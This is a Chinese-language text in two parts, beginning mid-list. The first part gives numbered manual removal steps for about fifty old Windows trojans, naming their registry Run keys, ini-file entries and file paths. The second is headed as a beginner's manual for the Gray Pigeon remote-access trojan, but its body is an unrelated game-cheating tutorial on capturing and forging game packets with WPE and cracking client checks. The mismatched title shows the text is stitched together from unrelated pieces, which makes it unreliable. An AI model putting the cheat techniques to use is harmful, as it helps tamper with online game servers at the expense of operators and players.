HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServices
删除右边的项目：Explorer = c:/....../agent.exe
关闭保存Regedit，重新启动Windows
查找到木马程序，并删除它们。
注意：c:/windows/system/下面的sysedit.exe文件是不是19KB，如果不是说明以被木马感染，删除它。
ＯＫ
56. Matrix v1.0 - 2.0
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：??? ="C:/WINDOWS/Wincfg.exe"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/Wincfg.exe
ＯＫ

57. MBK
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
查找并删除右边的项目：Explorer =" "后面是"mbt.exe"
关闭保存Regedit，重新启动Windows
查找mbt.exe并删除
ＯＫ
58. Millenium v1.0 - 2.0
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Millenium = "C:/windows/system/reg66.exe "
关闭保存Regedit，重新启动Windows
删除C:/windows/system/reg66.exe
ＯＫ
59. Mine
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目： Windows = ‘c:/msdos98.exe‘
关闭保存Regedit，重新启动Windows
删除c:/msdos98.exe
打开win.ini文件
查找到run=c:/windows/uninstallms.exe
更改为：run=
关闭保存win.ini，重新启动Windows
del c:/msdos98.exe
del c:/windows/uninst~1.exe
del c:/windows/system/mine.exe
ＯＫ
60. MoSucker
清除木马的步骤：

打开system.ini文件
查找到shell=Explorer.exe unin0686.exe
更改为：shell= Explorer.exe
关闭保存system.ini，重新启动Windows
删除C:/windows/unin0686.exe
ＯＫ
61. Naebi v2.12 - 2.40
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_CURRENT_USER/Software/Mirabilis/ICQ/Agent/Apps/ICQ
v2.12删除右边的项目：path= "C:/windows/msramgr.exe "
v2.15删除右边的项目：path= "C:/windows/ msdll32.exe "
v2.19删除右边的项目：path= "C:/windows/ naebi219.exe "
v2.xx删除右边的项目：path= "C:/windows/ naebi219.exe "文件名可能还是naebi.exe , ns220.exe, ns227, ns231, ns234
关闭保存Regedit
v2.34和上面相同，但它在win.ini增加了启动
打开win.ini文件
把run=后面的路径删除
关闭保存win.ini，重新启动Windows
查找相应的木马程序，并删除
ＯＫ
62. NetController v1.08
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：System = ‘c:/windows/system.exe‘
关闭保存Regedit，重新启动Windows
删除c:/windows/system.exe
ＯＫ
63. NetRaider v0.0
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Rsrcnrs = ‘C:/windows/rsrcnrs.exe‘
关闭保存Regedit，重新启动Windows
删除C:/windows/rsrcnrs.exe
ＯＫ
64. NetSphere v1.0 - 1.31337
清除木马v1.0-1.30：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：NSSX ="C:/WINDOWS/system/nssx.exe"
HKEY_CURRENT_USER/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
HKEY_USERS/****/Software/Microsoft/Windows/CurrentVersion/Run
删除项目同上。
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/system/nssx.exe
ＯＫ
清除木马v1.30-1.31337：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：ExecPowerProfile ="C:/WINDOWS/system/epp32.exe"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/system/epp32.exe
ＯＫ
65. NetSpy v1.0 - 2.0
清除木马v1.0：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：SysProtect = "c:/windows/system/system.exe"
关闭保存Regedit，重新启动Windows
删除c:/windows/system/system.exe
ＯＫ
清除木马v2.0：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Netspy = "netspy.exe"
关闭保存Regedit，重新启动Windows
查找到netspy.exe，并删除
ＯＫ
66. NetTrojan v1.0
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：*** = "C:/WINDOWS/System/glide16.exe"
关闭保存Regedit
打开win.ini文件
查找到run=c:/windows/fxp.exe
把run=后面的路径删除
关闭保存win.ini，重新启动Windows
查找相应的木马程序，并删除
ＯＫ
67. Nirvana / VisualKiller v1.94 - 1.95
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：TheDoor = ‘c:/windows/fonts/ariel.exe‘
关闭保存Regedit，重新启动Windows
删除c:/windows/fonts/ariel.exe
ＯＫ
68. Phaze Zero v1.0b + 1.1
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：MsgServ = "msgsvr32.exe"
关闭保存Regedit，重新启动Windows
查找相应的木马程序，并删除
ＯＫ
69. Prayer v1.2 - 1.5
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：SysFiles = "C:/WINDOWS/System/dlls32.exe"
HKEY_CURRENT_USER/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：SysFiles = "C:/WINDOWS/System/dlls32.exe"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/System/dlls32.exe
ＯＫ
70. PRIORITY (Beta)
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run Services
/
删除右边的项目："PServer"= C:/Windows/System/PServer.exe
关闭保存Regedit，重新启动Windows
删除C:/Windows/System/PServer.exe
ＯＫ
71. Progenic Password Thief / Keylogger v1.0
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：pwt ="C:/WINDOWS/SYSTEM/pwt.exe"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/SYSTEM/pwt.exe
ＯＫ
72. Progenic v1.0 -3.0
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Scandisk = "C:/WINDOWS/scandiskvr.exe"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/scandiskvr.exe
ＯＫ
73. Prosiak beta - 0.70 b5
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServices/
删除右边的项目：Microsoft DLL Loader = "windll32.exe"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/ windll32.exe
ＯＫ
74. Retrieve v1.3
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Microsoft Access ="C:/WINDOWS/access.exe"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/access.exe
ＯＫ
75. Revenger v1.0 - 1.5
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：AppName ="C:/.../server.exe"
关闭保存Regedit，重新启动Windows
在c:/windows查找相应的木马程序server.exe，并删除
ＯＫ

76. Ripper
清除木马的步骤：

打开system.ini文件
将shell=explorer.exe sysrunt.exe
改为shell= explorer.exe
关闭保存system.ini，重新启动Windows
在c:/windows查找相应的木马程序sysrunt.exe，并删除
ＯＫ
77. Satans Back Door v1.0
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServices/
删除右边的项目：sysprot protection ="C:/windows/sysprot.exe"
关闭保存Regedit，重新启动Windows
删除C:/windows/sysprot.exe
ＯＫ
78. Schwindler v1.82
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：User.exe = "C:/WINDOWS/User.exe"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/User.exe
ＯＫ
79. Setup Trojan (Sshare) +Mod Small Share
这个共享隐藏Ｃ盘的木马
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Network/LanMan/
选择右边有‘C$‘的项目，并全部删除
关闭保存Regedit，重新启动Windows
ＯＫ
80. ShadowPhyre v2.12.38 - 2.X
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：WinZipp = "C:/WINDOWS/SYSTEM/WinZipp.exe /nomsg"
或者WinZip = "C:/WINDOWS/SYSTEM/WinZip.exe /nomsg"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/ WinZipp.exe或者C:/WINDOWS/ WinZip.exe
ＯＫ
81. Share All

清除木马的步骤：
打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Network/LanMan/
这里你将看到所有被木马共享出来的你的硬盘符号，把它们一个个删除掉。

82. ShitHeap
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServices/
删除右边的项目：recycle-bin = "c:/windows/system/recycle-bin.exe"
或者recycle-bin = "c:/windows/system.exe"
关闭保存Regedit，重新启动Windows
删除c:/windows/system/recycle-bin.exe或者c:/windows/system.exe
ＯＫ
83. Snid v1 - 2
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：System-tray = ‘c:/windows/temp$01.exe‘
关闭保存Regedit，重新启动Windows
删除c:/windows/temp$01.exe
ＯＫ
84. Softwarst
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：NetApp = C:/windows/system/winserv.exe
关闭保存Regedit，重新启动Windows
删除C:/windows/system/winserv.exe
ＯＫ
85. Spirit 2000 Beta - v1.2 (fixed)
清除木马v Beta版本:

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：internet = "c:/windows/netip.exe "
关闭保存Regedit
打开win.ini文件
查找到run=c:/windows/netip.exe
更改为：run=
关闭保存win.ini，重新启动Windows
删除c:/windows/netip.exe和c:/windows/netip.exe
ＯＫ

清除木马v 1.2版本:
打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：SystemTray = "c:/windows/windown.exe "
关闭保存Regedit，重新启动Windows
删除c:/windows/windown.exe
ＯＫ

清除木马v 1.2(fixed)版本:
打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Server 1.2.exe = "c:/windows/server 1.2.exe"
关闭保存Regedit，重新启动Windows
删除c:/windows/server 1.2.exe
ＯＫ
86. Stealth v2.0 - 2.16
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Winprotect System = "C:/WINDOWS/winprotecte.exe
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/winprotecte.exe
ＯＫ
87. SubSeven - Introduction
清除木马v1.0 - 1.1：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：SystemTrayIcon = "C:/WINDOWS/SysTrayIcon.Exe"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/SysTrayIcon.Exe
ＯＫ

清除木马v1.3 - 1.4 - 1.5：

打开win.ini文件
查找到run=nodll
更改为run=
关闭保存win.ini，重新启动Windows
删除c:/windows/nodll.exe
ＯＫ

清除木马v1.6：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：SystemTray = "SysTray.Exe"
关闭保存Regedit，重新启动Windows
删除C:/windows/systray.exe
ＯＫ

清除木马v1.7：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServices
/
查找到右边的项目：C:/windows/kernel16.dl，并删除
关闭保存Regedit，重新启动Windows
删除C:/windows/kernel16.dl
ＯＫ

清除木马v1.8：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run和
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServices
/
查找到右边的项目：c:/windows/system.ini.，并删除
关闭保存Regedit。
打开win.ini文件
查找到run= kernel16.dl
更改为run=
关闭保存win.ini。
打开system.ini文件
查找到shell=explorer.exe kernel32.dl
更改为shell=explorer.exe
关闭保存system.ini，重新启动Windows
删除C:/windows/kernel16.dl
ＯＫ

清除木马v1.9 - 1.9b：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run和
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServices
/
删除右边的项目：RegistryScan = "rundll16.exe"
关闭保存Regedit，重新启动Windows
删除C:/windows/rundll16.exe
ＯＫ

清除木马v2.0：

打开system.ini文件
查找到shell=explorer.exe trojanname.exe
更改为shell=explorer.exe
关闭保存system.ini，重新启动Windows
删除c:/windows/rundll16.exe
ＯＫ

清除木马v2.1 - 2.1 Gold + SubStealth- 2.1.3 Mod + 2.1.3 MUIE + 2.1 Bonus：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run和
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServices
/
删除右边的项目：WinLoader = MSREXE.EXE
hkey_classes_root/exefile/shell/open/command
将右边的项目更改为：@="/"%1/" %*"
关闭保存Regedit。
打开win.ini文件
查找到run=msrexe.exe和
load=msrexe.exe
更改为run=
load=
关闭保存win.ini。
打开system.ini文件
查找到shell=explore.exe msrexe.exe
更改为shell=explorer.exe
关闭保存system.ini，重新启动Windows
删除C:/windows/ msrexe.exe
C:/windows/system/systray.dll
ＯＫ

清除木马v2.2b1：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run和
删除右边的项目：加载器 = "c:/windows/system/***"
注：加载器和文件名是随意改变的
关闭保存Regedit。
打开win.ini文件
更改为run=
关闭保存win.ini。
打开system.ini文件
更改为shell=explorer.exe
关闭保存system.ini，重新启动Windows
删除相对应的木马程序
ＯＫ

88. Telecommando 1.54
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：SystemApp＝"ODBC.EXE"
关闭保存Regedit，重新启动Windows
删除C:/windows/system/ ODBC.EXE
ＯＫ
89. The Unexplained
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：InetB00st = "C:/WINDOWS/TEMPINETB00ST.EXE"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/TEMPINETB00ST.EXE
ＯＫ
90. Thing v1.00 - 1.60
清除木马v1.00-1.12：

点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：(Default) = "C:/some/path/here/thing.exe"
也有一些是在：
HKEY_LOCAL_MACHINE/System/CurrentControlSet/control/SessionManager/Known16DLLs/
删除右边的项目：wsasrv.exe = "wsasrv.exe"
关闭保存Regedit，重新启动Windows
删除C:/some/path/here/thing.exe
ＯＫ

清除木马v 1.20版本:
进入MS_DOS方式：
del winspc13.exe
del ms097.exe
打开system.ini文件
查找到shell=explorer.exe ms097.exe
更改为：shell=explorer.exe
关闭保存system.ini，重新启动Windows
ＯＫ

清除木马v1.50版本:
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
这个项目的路径和文件名是随机改变的，察看有可疑的文件路径，将它删除。
关闭保存Regedit。
打开system.ini文件
查找到shell=explorer.exe后面是木马文件
更改为：shell=explorer.exe
关闭保存system.ini，重新启动Windows
删除相应的木马文件
ＯＫ

清除木马v1.50版本:
进入MS_DOS方式：
del winspc13.exe
del ms097.exe
打开system.ini文件
查找到shell=explorer.exe后面是木马文件
更改为：shell=explorer.exe
关闭保存system.ini，重新启动Windows
删除相应的木马文件
ＯＫ
91. Transmission Scount v1.1 - 1.2
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Kernel16" = C:/WINDOWS/Kernel16.exe
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/Kernel16.exe
ＯＫ
92. Trinoo
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目： System Services = service.exe
关闭保存Regedit，重新启动Windows
删除C:/windows/system/service.exe
ＯＫ
93. Trojan Cow v1.0
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：SysWindow = "C:/WINDOWS/Syswindow.exe"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/Syswindow.exe
ＯＫ
94. TryIt
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Rc5Dec = C:/Program Files/Internet Explorer/_.exe -guistart
关闭保存Regedit，重新启动Windows
删除C:/Program Files/Internet Explorer/_.exe
ＯＫ
95. Vampire v1.0 - 1.2
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Sockets ="c:/windows/system/Sockets.exe"
关闭保存Regedit，重新启动Windows
删除c:/windows/system/Sockets.exe
ＯＫ
96. WarTrojan v1.0 - 2.0
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：Kernel32 = "C:/somepath/server.exe"
关闭保存Regedit，重新启动Windows
删除C:/somepath/server.exe
ＯＫ
97. wCrat v1.2b
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：MS Windows System Explorer ="C:/WINDOWS/sysexplor.exe"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/sysexplor.exe
ＯＫ
98. WebEx (v1.2, 1.3, and 1.4)
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：RunDl32 = "C:/windows/system/task_bar"
关闭保存Regedit，重新启动Windows
删除C:/windows/system/task_bar.exe和c:/windows/system/msinet.ocx
ＯＫ
99. WinCrash v2
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：WinManager = "c:/windows/server.exe"
关闭保存Regedit
打开win.ini文件
查找到run=c:/windows/server.exe
更改为：run=
保存关闭win.ini，重新启动Windows
删除c:/windows/server.exe
ＯＫ
100. WinCrash
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：MsManager ="SERVER.EXE"
关闭保存Regedit，重新启动Windows
删除C:/windows/system/ SERVER.EXE
ＯＫ
101. Xanadu v1.1
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：SETUP = "c:/somepath/setup.exe"
关闭保存Regedit，重新启动Windows
删除c:/somepath/setup.exe
ＯＫ
102. Xplorer v1.20
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：PCX = "C:/WINDOWS/system/PCX.exe"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/system/PCX.exe
ＯＫ
103. Xtcp v2.0 - 2.1
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除右边的项目：msgsv32 = "C:/WINDOWS/system/winmsg32.exe"
关闭保存Regedit，重新启动Windows
删除C:/WINDOWS/system/winmsg32.exe
ＯＫ
104. YAT
清除木马的步骤：

打开注册表Regedit
点击目录至：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServices/
删除右边的项目：Batterieanzeige = ‘c:/pathnamehere/server.exe /nomsg‘
关闭保存Regedit，重新启动Windows
删除c:/pathnamehere/server.exe
ＯＫ

灰鸽子完全手册(送给新手)

要想在修改游戏中做到百战百胜，是需要相当丰富的计算机知识的。有很多计算机高手就是从玩游戏，修改游戏中，逐步对计算机产生浓厚的兴趣，逐步成长起来的。不要在羡慕别人能够做到的，因为别人能够做的你也能够！我相信你们看了本教程后，会对游戏有一个全新的认识，呵呵，因为我是个好老师！（别拿鸡蛋砸我呀，救命啊！#￥%……*）

　　不过要想从修改游戏中学到知识，增加自己的计算机水平，可不能只是靠修改游戏呀！
要知道，修改游戏只是一个验证你对你所了解的某些计算机知识的理解程度的场所，只能给你一些发现问题、解决问题的机会，只能起到帮助你提高学习计算机的兴趣的作用，而决不是学习计算机的捷径。

一：什么叫外挂？
现在的网络游戏多是基于Internet上客户／服务器模式，服务端程序运行在游戏服务器上，游戏的设计者在其中创造一个庞大的游戏空间，各地的玩家可以通过运行客户端程序同时登录到游戏中。简单地说，网络游戏实际上就是由游戏开发商提供一个游戏环境，而玩家们就是在这个环境中相对自由和开放地进行游戏操作。那么既然在网络游戏中有了服务器这个概念，我们以前传统的修改游戏方法就显得无能为力了。记得我们在单机版的游戏中，随心所欲地通过内存搜索来修改角色的各种属性，这在网络游戏中就没有任何用处了。因为我们在网络游戏中所扮演角色的各种属性及各种重要资料都存放在服务器上，在我们自己机器上（客户端）只是显示角色的状态，所以通过修改客户端内存里有关角色的各种属性是不切实际的。那么是否我们就没有办法在网络游戏中达到我们修改的目的？回答是"否"。我们知道Internet客户／服务器模式的通讯一般采用TCP/IP通信协议，数据交换是通过IP数据包的传输来实现的，一般来说我们客户端向服务器发出某些请求，比如移动、战斗等指令都是通过封包的形式和服务器交换数据。那么我们把本地发出消息称为SEND，意思就是发送数据，服务器收到我们SEND的消息后，会按照既定的程序把有关的信息反馈给客户端，比如，移动的坐标，战斗的类型。那么我们把客户端收到服务器发来的有关消息称为RECV。知道了这个道理，接下来我们要做的工作就是分析客户端和服务器之间往来的数据（也就是封包），这样我们就可以提取到对我们有用的数据进行修改，然后模拟服务器发给客户端，或者模拟客户端发送给服务器，这样就可以实现我们修改游戏的目的了。

目前除了修改游戏封包来实现修改游戏的目的，我们也可以修改客户端的有关程序来达到我们的要求。我们知道目前各个服务器的运算能力是有限的，特别在游戏中，游戏服务器要计算游戏中所有玩家的状况几乎是不可能的，所以有一些运算还是要依靠我们客户端来完成，这样又给了我们修改游戏提供了一些便利。比如我们可以通过将客户端程序脱壳来发现一些程序的判断分支，通过跟踪调试我们可以把一些对我们不利的判断去掉，以此来满足我们修改游戏的需求。

在下几个章节中，我们将给大家讲述封包的概念，和修改跟踪客户端的有关知识。大家准备好了吗？

游戏数据格式和存储：

在进行我们的工作之前，我们需要掌握一些关于计算机中储存数据方式的知识和游戏中储存数据的特点。本章节是提供给菜鸟级的玩家看的，如果你是高手就可以跳过了，呵呵！
　　如果，你想成为无坚不摧的剑客，那么，这些东西就会花掉你一些时间；如果，你只想作个江湖的游客的话，那么这些东西，了解与否无关紧要。是作剑客，还是作游客，你选择吧！

现在我们开始！首先，你要知道游戏中储存数据的几种格式，这几种格式是：字节(BYTE)、字(WORD)和双字(DOUBLE
WORD)，或者说是8位、16位和32位储存方式。字节也就是8位方式能储存0~255的数字；字或说是16位储存方式能储存0~65535的数；双字即32位方式能储存0~4294967295的数。

为何要了解这些知识呢？在游戏中各种参数的最大值是不同的，有些可能100左右就够了，比如，金庸群侠传中的角色的等级、随机遇敌个数等等。而有些却需要大于255甚至大于65535，象金庸群侠传中角色的金钱值可达到数百万。所以，在游戏中各种不同的数据的类型是不一样的。在我们修改游戏时需要寻找准备修改的数据的封包，在这种时候，正确判断数据的类型是迅速找到正确地址的重要条件。

　　在计算机中数据以字节为基本的储存单位，每个字节被赋予一个编号，以确定各自的位置。这个编号我们就称为地址。

在需要用到字或双字时，计算机用连续的两个字节来组成一个字，连续的两个字组成一个双字。而一个字或双字的地址就是它们的低位字节的地址。
现在我们常用的Windows 9x操作系统中，地址是用一个32位的二进制数表示的。而在平时我们用到内存地址时，总是用一个8位的16进制数来表示它。

二进制和十六进制又是怎样一回事呢？

　　简单说来，二进制数就是一种只有0和1两个数码，每满2则进一位的计数进位法。同样，16进制就是每满十六就进一位的计数进位法。16进制有0--F十六个数字，它为表示十到十五的数字采用了A、B、C、D、E、F六个数字，它们和十进制的对应关系是：A对应于10，B对应于11，C对应于12，D对应于13，E对应于14，F对应于15。而且，16进制数和二进制数间有一个简单的对应关系，那就是；四位二进制数相当于一位16进制数。比如，一个四位的二进制数1111就相当于16进制的F，1010就相当于A。

了解这些基础知识对修改游戏有着很大的帮助，下面我就要谈到这个问题。由于在计算机中数据是以二进制的方式储存的，同时16进制数和二进制间的转换关系十分简单，所以大部分的修改工具在显示计算机中的数据时会显示16进制的代码，而且在你修改时也需要输入16进制的数字。你清楚了吧？

　　在游戏中看到的数据可都是十进制的，在要寻找并修改参数的值时，可以使用Windows提供的计算器来进行十进制和16进制的换算，我们可以在开始菜单里的程序组中的附件中找到它。

　　现在要了解的知识也差不多了！不过，有个问题在游戏修改中是需要注意的。在计算机中数据的储存方式一般是低位数储存在低位字节，高位数储存在高位字节。比如，十进制数41715转换为16进制的数为A2F3，但在计算机中这个数被存为F3A2。

看了以上内容大家对数据的存贮和数据的对应关系都了解了吗？ 好了，接下来我们要告诉大家在游戏中，封包到底是怎么一回事了，来！大家把袖口卷起来，让我们来干活吧！
二：什么是封包？
怎么截获一个游戏的封包？
怎么去检查游戏服务器的ip地址和端口号？
Internet用户使用的各种信息服务，其通讯的信息最终均可以归结为以IP包为单位的信息传送，IP包除了包括要传送的数据信息外，还包含有信息要发送到的目的IP地址、信息发送的源IP地址、以及一些相关的控制信息。当一台路由器收到一个IP数据包时，它将根据数据包中的目的IP地址项查找路由表，根据查找的结果将此IP数据包送往对应端口。下一台IP路由器收到此数据包后继续转发，直至发到目的地。路由器之间可以通过路由协议来进行路由信息的交换，从而更新路由表。

那么我们所关心的内容只是IP包中的数据信息，我们可以使用许多监听网络的工具来截获客户端与服务器之间的交换数据，下面就向你介绍其中的一种工具：WPE。

WPE使用方法：
执行WPE会有下列几项功能可选择：

SELECT GAME
选择目前在记忆体中您想拦截的程式，您只需双击该程式名称即可。

TRACE
追踪功能。用来追踪撷取程式送收的封包。
WPE必须先完成点选欲追踪的程式名称，才可以使用此项目。
按下Play键开始撷取程式收送的封包。
您可以随时按下 | | 暂停追踪，想继续时请再按下 | | 。
按下正方形可以停止撷取封包并且显示所有已撷取封包内容。
若您没按下正方形停止键，追踪的动作将依照OPTION里的设定值自动停止。
如果您没有撷取到资料，试试将OPTION里调整为Winsock Version 2。
WPE 及 Trainers 是设定在显示至少16 bits 颜色下才可执行。

FILTER
过滤功能。用来分析所撷取到的封包，并且予以修改。

SEND PACKET
送出封包功能。能够让您送出假造的封包。

TRAINER MAKER
制作修改器。
OPTIONS
设定功能。让您调整WPE的一些设定值。
FILTER的详细教学
- 当FILTER在启动状态时 ，ON的按钮会呈现红色。
- 当您启动FILTER时，您随时可以关闭这个视窗。FILTER将会保留在原来的状态，直到您再按一次 on / off 钮。
